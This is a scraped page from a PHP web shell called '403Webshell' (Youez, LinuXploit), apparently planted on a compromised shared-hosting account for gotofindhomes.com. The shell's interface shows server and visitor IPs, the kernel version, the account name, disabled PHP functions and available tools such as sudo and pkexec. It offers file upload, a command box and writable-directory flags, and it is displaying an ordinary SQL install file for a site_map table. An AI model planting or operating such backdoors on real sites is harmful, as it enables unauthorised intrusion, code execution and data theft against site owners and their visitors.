403Webshell
Server IP : 172.67.178.83  /  Your IP : 216.73.217.141
Web Server : Apache
System : Linux hosting01.arsenalhost.com 4.18.0-425.13.1.lve.el8.x86_64 #1 SMP Mon Feb 27 15:23:24 EST 2023 x86_64
User : corbizre ( 1013)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/corbizre/gotofindhomes.com/components/Site/Map/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/corbizre/gotofindhomes.com/components/Site/Map/install.sql
/*
SQLyog Community Edition- MySQL GUI v8.12 
MySQL - 5.1.34-community : Database - all-music-online
*********************************************************************
*/


/*!40101 SET NAMES utf8 */;

/*!40101 SET SQL_MODE=''*/;

/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;

/*Table structure for table `site_map` */

DROP TABLE IF EXISTS `site_map`;

CREATE TABLE `site_map` (
  `ID` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `URL` text,
  `Freq` varchar(30) NOT NULL DEFAULT '',
  `Priority` varchar(10) NOT NULL DEFAULT '',
  PRIMARY KEY (`ID`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;

/*Data for the table `site_map` */

insert  into `site_map`(`ID`,`URL`,`Freq`,`Priority`) values (1,'','','');

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;

Youez - 2016 - github.com/yon3zu
LinuXploit